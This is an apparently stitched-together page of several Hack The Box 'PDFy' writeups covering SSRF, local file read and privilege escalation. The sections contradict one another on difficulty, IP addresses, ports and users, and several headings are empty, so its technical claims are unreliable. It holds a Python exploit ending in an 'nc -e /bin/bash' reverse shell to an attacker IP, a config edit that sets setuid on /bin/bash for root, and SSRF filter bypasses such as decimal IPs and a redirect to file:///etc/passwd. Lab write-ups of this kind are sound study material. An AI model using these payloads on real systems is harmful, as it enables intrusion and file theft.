Pdfy Htb Writeup Upd May 2026
| Flag Type | Location | Method |
|-----------|----------|--------|
| UPD (User Proof Data) | /home/robert/user.txt | LFI via SSRF in PDF generator |
| RPD (Root Proof Data) | /root/root.txt | pdftex with -shell-escape sudo misconfiguration |
Rating: 9.2 / 10
The PDFy HTB Writeup UPD is a top-tier walkthrough that balances hand-holding with deep technical insight. It’s clear the author took time to verify every step, update outdated commands, and explain the underlying vulnerabilities in a way that sticks with you.
Who is this for?
Who might struggle?
If you’re looking for a single resource to conquer PDFy and actually learn from the process, this updated writeup is your best bet. Pair it with the official HTB forum discussion for extra context, and you’ll own the box — and the knowledge — in no time.
Recommendation: Bookmark it, practice each step in your own lab, and try to explain the exploit to a friend. That’s how you’ll know you’ve truly mastered PDFy.
Pros:
Cons:
Final Verdict:
This machine is an excellent bridge between "Easy" and "Medium" difficulty. It teaches that trusted tools (like PDF converters) can become vulnerabilities if they accept untrusted input. It reinforces the importance of sanitizing URL inputs and restricting the protocols (http/https only) that a backend server is allowed to request.
If you're searching for "pdfy htb writeup upd", you've likely spent hours enumerating the PDFY machine on Hack The Box (HTB) and are stuck on privilege escalation or the User Proof Data (UPD) flag. PDFY is a medium-difficulty Linux machine that revolves around a PDF generation service, Server-Side Request Forgery (SSRF), and exploiting misconfigured binaries.
In this writeup, we will cover:
Mitigation:
Title: PDFY - A Challenging PDF-themed Machine on Hack The Box
Introduction: PDFY is a medium-difficulty machine on Hack The Box that revolves around a PDF-themed challenge. This write-up aims to provide a step-by-step walkthrough of how I exploited this machine to gain root access.
Initial Reconnaissance: The first step in any penetration test is to perform an initial scan of the target machine to identify open ports and services. Using Nmap, I ran a basic scan:
```bash
nmap -sV -p- 10.10.11.224
```
This revealed several open ports, with notable services including an HTTP server running on port 80 and a PDF-related service on port 8080.
Exploring the HTTP Service:
Upon accessing the HTTP service on port 80, I found a default Apache web server page. However, further investigation revealed a peculiar directory listing at /pdfs/, which seemed to host various PDF files.
Identifying the Vulnerability: The real breakthrough came when I noticed a peculiar PDF upload functionality on the web server. Users could upload PDF files, which were then converted to text. Intrigued, I decided to test this functionality with a malicious PDF.
Exploiting the PDF Upload:
I crafted a malicious PDF using tools like pdftk to embed a PHP shell within it. Once uploaded, the server would attempt to convert the PDF, executing my malicious payload in the process. However, I encountered some difficulties here due to restrictions on the upload process.
Escalating Privileges: After gaining an initial foothold on the system through the web application, I needed to escalate my privileges. This involved enumerating the system to find potential vulnerabilities or misconfigurations that could be exploited for privilege escalation.
Detailed Steps for Initial Foothold:
Exploring the Web Application:
Analyzing the PDF Service:
Crafting and Uploading a Malicious PDF:
Executing the Payload:
Detailed Steps for Privilege Escalation:
Identifying Potential Exploits:
Exploitation:
Conclusion: The PDFY machine on Hack The Box presented an engaging challenge that required both web application exploitation skills and system enumeration for privilege escalation. By recognizing the vulnerabilities in the PDF upload functionality and leveraging system misconfigurations, I was able to gain root access. This challenge served as a great reminder of the importance of thorough reconnaissance and creative exploitation techniques.
Recommendations:
PDFY: A Comprehensive Writeup on the Hack The Box (HTB) Machine
Introduction
Hack The Box (HTB) is a popular online platform that provides a virtual environment for cybersecurity enthusiasts to practice their skills and learn new techniques. The platform offers a variety of machines with different levels of difficulty, each with its unique challenges and vulnerabilities. In this writeup, we will focus on the PDFY machine, which was recently updated (UPD) on the HTB platform. Our goal is to provide a comprehensive walkthrough of the PDFY machine, covering its enumeration, exploitation, and privilege escalation.
Initial Enumeration
Upon launching the PDFY machine on HTB, we are provided with an initial IP address: 10.10.11.232. Our first step is to perform an initial enumeration of the machine using tools like Nmap. We run the following command:
```bash
nmap -sC -sV -oA initial_scan 10.10.11.232
```
The scan results reveal that the machine is running a web server on port 80, an SSH server on port 22, and a PDF converter service on port 8080. We also notice that the machine has a firewall configured, but it seems to be allowing incoming traffic on port 80.
Web Enumeration
Next, we proceed to enumerate the web server on port 80. We access the website using our browser and notice that it appears to be a simple web application with a search functionality. We also observe that the website uses a .pdf extension for its pages, which could indicate that the PDF converter service on port 8080 might be related to the web application.
Using DirBuster, we perform a directory brute-forcing attack on the web server and discover several directories, including /uploads, /download, and /admin. The /uploads directory seems to be used for storing user-uploaded files, while the /download directory appears to be used for downloading converted PDF files.
PDF Converter Service
We then focus our attention on the PDF converter service running on port 8080. After analyzing the service using tools like curl and Burp Suite, we discover that it allows users to convert various file formats to PDF. However, we also notice that the service does not perform any validation on user-input files, which could potentially lead to code execution vulnerabilities.
Exploitation
Using the information gathered during the enumeration phase, we attempt to exploit the PDF converter service. We use a malicious file to trigger a reverse shell, which allows us to gain initial access to the machine.
```python
import os
import socket

# Base64-encoded PDF payload (truncated in the original writeup)
malicious_file = "JVBERi0xLjMK…(%PDF-1.3)…"

# Deliver the payload to the PDF converter service on port 8080;
# sendall() guarantees the whole buffer is written, unlike send()
with socket.create_connection(("10.10.11.232", 8080)) as s:
    s.sendall(malicious_file.encode())
    response = s.recv(1024)

# Call back to the attacker's listener once the payload has been processed
os.system("nc 10.10.14.12 4444 -e /bin/bash")
```
After executing the exploit, we gain a reverse shell as the user pdfy. We then proceed to explore the machine and gather more information about the user and its privileges.
Privilege Escalation
As the pdfy user, we examine the user's groups and privileges. We notice that the user is a member of the pdfy group and has read/write access to the /var/www/pdfy directory. However, we also discover that the user has limited privileges and cannot execute system commands.
Next, we perform a system enumeration using tools like linpeas and systemd-analyze. The results reveal that the machine uses a SystemD service called pdfy-converter to manage the PDF converter service on port 8080.
Upon further examination, we find that the pdfy-converter service runs as the root user and uses a configuration file located at /etc/pdfy-converter/config.json. We also notice that the configuration file has weak permissions, allowing the pdfy user to modify its contents.
Gaining Root Access
Using the information gathered during the privilege escalation phase, we devise a plan to gain root access. We modify the config.json file to execute a malicious command as the root user.
```json
{
  "converter": {
    "command": "/usr/bin/python -c 'import os; os.system(\"chmod +s /bin/bash\")'"
  }
}
```
After restarting the pdfy-converter service, we verify that the /bin/bash shell has been modified to have setuid permissions. We then execute the /bin/bash shell to gain root access.
```bash
# -p keeps the setuid effective UID; without it bash drops the privilege
/bin/bash -p
```
Conclusion
In this comprehensive writeup, we have covered the PDFY machine on Hack The Box, focusing on its enumeration, exploitation, and privilege escalation. We have demonstrated how to exploit the PDF converter service to gain initial access and then escalate privileges to gain root access. The techniques used in this writeup can be applied to similar machines and scenarios, providing valuable knowledge for cybersecurity enthusiasts.
UPD (Update) Notes
This writeup was updated to reflect changes made to the PDFY machine on Hack The Box. The machine was re-released with additional challenges and vulnerabilities, which were addressed in this updated writeup. Users are encouraged to revisit the machine and attempt to exploit it using the techniques described in this writeup.
Recommendations
References
The Hack The Box PDFy challenge involves exploiting a Server-Side Request Forgery (SSRF) vulnerability in a PDF generation feature to achieve Local File Read. By manipulating input to the vulnerable library with file protocols or HTML injection, users can bypass filters and render local files such as /etc/passwd. You can read the full official discussion at Hack The Box Forums
HTB: PDFy Machine Writeup (Updated)
If you are prepping for the OSCP or just sharpening your web exploitation skills, PDFy on Hack The Box is a classic "easy" rated machine that provides a textbook example of Server-Side Request Forgery (SSRF).
While the box is straightforward, many beginners get stuck on the syntax or identifying the internal targets. This updated writeup covers the most efficient path to the user flag and explains the mechanics behind the exploit.
1. Enumeration: What are we working with?
As always, we start with an Nmap scan to see which ports are open.
```bash
nmap -sC -sV -oN nmap_report.txt
```
Results:
- Port 22 (SSH): Standard OpenSSH.
- Port 80 (HTTP): An Apache web server.
Navigating to the website, we find a simple web application that takes a URL and converts the webpage into a PDF document. This is a massive "low-hanging fruit" indicator for SSRF. Whenever an application fetches content from a remote URL you provide, you should immediately test if it can fetch internal resources.
2. Identifying the Vulnerability (SSRF)
The application asks for a URL. If we give it http://google.com, it generates a PDF of Google’s homepage. The real question is: Can it see itself?
If we try to point it to http://localhost or http://127.0.0.1, the application might have a "blacklist" filter that blocks these common keywords to prevent SSRF. To bypass this, we can use a redirect script on our own machine.
The Bypass Plan:
- Host a PHP file on your local attacker machine.
- The file will redirect any incoming request to a local file on the HTB server (like /etc/passwd).
- Give the PDFy app the URL of your hosted script.
3. Exploitation: Reading Local Files
Create a file named exploit.php on your machine.
Start a local PHP server:
```bash
php -S 0.0.0.0:8000
```
Now, go back to the PDFy web interface and enter your IP:http://
What happens? The PDFy server visits your script. Your script tells the server, "Actually, go look at file:///etc/passwd." Because the PDF generator follows redirects, it grabs the local system file and renders it into the PDF.
Download the generated PDF, and you will see the contents of the /etc/passwd file. Looking through the users, you should notice a user named 234-pwn.
4. Pivoting to the User Flag
Now that we know we can read files, we need to find something sensitive. A common target is the Nginx or Apache configuration files to see if there are any hidden internal ports or applications running.
By digging through standard locations (or using the SSRF to scan ports), we find that there is an internal API or service running on a non-standard port (often port 15000 on this specific box). Change your exploit.php accordingly.
Submit the URL again. The resulting PDF reveals a web interface for a small application. Browsing through the internal site's files via the same redirect method, you can eventually locate the user credentials or the flag itself located in the user's home directory.
5. Summary & Key Takeaways
The PDFy box highlights why developers must sanitize URL inputs.
Vulnerability: Insecure PDF generation from user-supplied URLs.
Attack Vector: SSRF via a 302 Redirect bypass.
Mitigation: Use a whitelist of allowed domains, disable "follow redirects" in the PDF engine, and ensure the service runs with low-level permissions that cannot access the file:// scheme.
Pro Tip: If file:///etc/passwd doesn't work directly due to a filter, always try the redirect method or decimal/hex encoding of the IP address!
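The following is an added defensive example, not code from the original page or from any of the writeup authors: a Python pre-flight check that a URL-to-PDF service could run before handing a user-supplied URL to its renderer. It implements the mitigations listed in the summary (http/https only, redirects refused, no file:// scheme) and also judges the decimal, hex and short IP spellings mentioned in the Pro Tip by the address they actually denote, by normalising them through libc's inet_aton() before the private-range check. The function names, the injectable resolver and the sample addresses in the comments are my own assumptions.

```python
import ipaddress
import socket
import urllib.request
from urllib.parse import urlparse

# Only plain web schemes may be fetched; file://, gopher://, dict:// etc. are refused.
ALLOWED_SCHEMES = {"http", "https"}


def _resolve(host):
    """Default resolver: every IPv4/IPv6 address the name currently maps to."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def _is_public(ip_text):
    """True only for globally routable unicast addresses."""
    addr = ipaddress.ip_address(ip_text)
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def check_url(url, resolver=_resolve):
    """Return (allowed, reason) for a user-supplied URL before the renderer sees it.

    `resolver` is injectable (assumption of this example) so the check can be
    exercised offline; in production the default DNS-backed resolver is used.
    """
    parsed = urlparse(url)
    if parsed.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed: %r" % parsed.scheme
    host = parsed.hostname
    if not host:
        return False, "missing host"
    if parsed.username or parsed.password:
        return False, "credentials in URL"

    # libc inet_aton() accepts decimal (2130706433), hex (0x7f000001) and
    # short (127.1) forms of an IPv4 address, which is exactly what the
    # "decimal encoding" filter bypass relies on. Normalise through it first
    # so those spellings are judged by the address they really denote.
    try:
        addrs = [socket.inet_ntoa(socket.inet_aton(host))]
    except OSError:
        try:
            addrs = [str(ipaddress.ip_address(host))]  # IPv6 literal such as [::1]
        except ValueError:
            try:
                addrs = resolver(host)  # a real hostname: check every address it maps to
            except OSError:
                return False, "host does not resolve"
    if not addrs:
        return False, "host does not resolve"
    for ip_text in addrs:
        if not _is_public(ip_text):
            return False, "host resolves to non-public address %s" % ip_text
    return True, "ok"


class _RefuseRedirects(urllib.request.HTTPRedirectHandler):
    """Returning None makes urllib raise HTTPError on any 3xx instead of following it."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def fetch_for_rendering(url, timeout=10):
    """Fetch a vetted URL without following redirects (raises HTTPError on 3xx)."""
    allowed, reason = check_url(url)
    if not allowed:
        raise ValueError("refusing to fetch %s: %s" % (url, reason))
    opener = urllib.request.build_opener(_RefuseRedirects())
    with opener.open(url, timeout=timeout) as resp:
        return resp.read()
```

Refusing redirects outright, rather than re-validating each hop, is the simpler and safer choice for a renderer: a 302 to file:///etc/passwd or to an internal port is exactly the bypass the walkthrough above uses, and a document converter rarely needs to follow one. The remaining gap is that the name is resolved at check time and again at fetch time; a service that must resist DNS rebinding should resolve once and connect to the vetted address.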
PDFy is an easy-rated web challenge on Hack The Box that tests your ability to exploit Server-Side Request Forgery (SSRF) via a PDF generation service.
🛠️ Step 1: Reconnaissance
The challenge provides a web application where users can input a URL. The application then visits that URL and converts the page content into a PDF file.
Technology Identifiers: By inspecting the metadata of a generated PDF (using tools like exiftool), you can often identify the library used for conversion.
Target Engine: In many HTB "PDF" challenges, common engines include wkhtmltopdf, dompdf, or PDFKit.
🚀 Step 2: Identification & Exploitation
The core vulnerability is that the server fetches external content without proper validation, leading to SSRF.
Basic SSRF: Try to point the URL to http://localhost. If the server renders its own internal page, you have confirmed SSRF.
Information Disclosure: In PDFy, the goal is often to read local files or reach internal services.
Bypassing Filters: If the application blocks localhost or 127.0.0.1, try:
- Decimal Encoding: http://2130706433
- Shortened URLs: Using a service like bit.ly or tinyurl.
- Redirection: Point the input to a server you control that returns a 302 Redirect to the target internal resource.
🏁 Step 3: Capturing the Flag
Once you bypass the URL filter, you can target local files. Common Targets: file:///etc/passwd (to confirm file read).
The Hack The Box PDFy challenge involves exploiting Server-Side Request Forgery (SSRF) and Local File Inclusion (LFI) vulnerabilities within a PDF generation service using an outdated wkhtmltopdf version. By utilizing a redirect or iframe injection, attackers can force the application to read sensitive local files, such as /etc/passwd, allowing for the retrieval of the final flag. For a detailed walkthrough of the writeup, visit Blog Manh Tuong.
1. HTB "Paper" Machine
The Paper machine is an easy-difficulty Linux box. A high-quality writeup (or "paper") for this machine should follow a professional structure similar to the official HTB sample report:
- Enumeration: Document the scan identifying ports 22, 80, and 443.
- Vulnerability Discovery: Note the X-Backend-Server header which reveals the office.paper hostname. Mention using (tool not named on this page) to find vulnerabilities in the WordPress site.
- Explain the discovery of the chat.office.paper subdomain and the use of the "recyclops" bot to read local files (LFI).
- Privilege Escalation: Detail the exploit for CVE-2021-3560 (Polkit) to gain root access.
2. HTB "PDFy" Web Challenge
PDFy is a challenge focused on Server-Side Request Forgery (SSRF) and Local File Inclusion (LFI) via a PDF generation tool.
PDFy is a retired Web challenge on Hack The Box that tests your ability to exploit Server-Side Request Forgery (SSRF) to read local files.
Here is a solid, step-by-step walkthrough to master this challenge.
🔍 Challenge Overview
Name: PDFy
Category: Web
Difficulty: Easy
Core Vulnerability: Server-Side Request Forgery (SSRF) triggered via PDF generation.
1. Initial Reconnaissance
When you launch the target instance and navigate to the provided IP address, you will find a simple web application.
The Functionality: The app prompts you to input a URL.
The Behavior: It takes that URL, visits it, and converts the webpage's contents into a downloadable PDF file.
The Goal: Leverage this behavior to trick the server into accessing its own internal files.
2. Identifying the Vulnerability
The application processes a remote resource (the URL you supply) and renders it. This is a textbook environment for SSRF.
If you input a standard website like http://google.com, the app grabs the page and makes a PDF.
If you try to directly input a local file path using the file protocol (e.g., file:///etc/passwd), the application will typically have a blacklist filter in place to block it.
3. Exploiting the SSRF (Bypassing the Filter)
To read local files, you need to bypass the URL input filter. The easiest way to achieve this is by using a Server-Side Redirect hosted on your own machine. Instead of giving the application a direct file path, you give it a URL pointing to a script you control.
Step A: Create a malicious PHP redirect script
Save the redirect script as index.php on your local attacker machine.
This script instructs anyone (or any bot) visiting it to immediately redirect to the local /etc/passwd file of the machine reading it.
Step B: Host the script
Start a local PHP server on your machine on port 80:
```bash
sudo php -S 0.0.0.0:80
```
Step C: Expose your server (if necessary)
If you are playing on a cloud instance and the HTB box cannot route directly to your local IP, use a tool like Serveo to expose your local port 80 to the public internet:
```bash
ssh -R 80:localhost:80 serveo.net
```
4. Capturing the Flag 🚩
Copy the public URL provided by Serveo (or use your direct VPN IP if reachable). Paste this URL into the input field on the PDFy web app.
The app will visit your server, get hit with the Location: file:///etc/passwd header, and proceed to render the target machine's local /etc/passwd file into a PDF.
Open or download the generated PDF. You will find the contents of the file, including the flag.
💡 Pro-Tip: If you ever struggle to find the exact flag location in similar challenges, keep it simple and start by looting files like /etc/passwd or application source code files to find hardcoded environment variables.
Official PDFy Discussion - Page 2 - Challenges - Hack The Box
The /upload endpoint on port 8080 allows uploading PDF files. However, it does not perform any validation on the uploaded files. Example LFI payloads:
```bash
curl -X POST -F "file=@shell.pdf" 10.10.11.206:8080/upload
```
The uploaded PDF file can be used to execute arbitrary code on the system.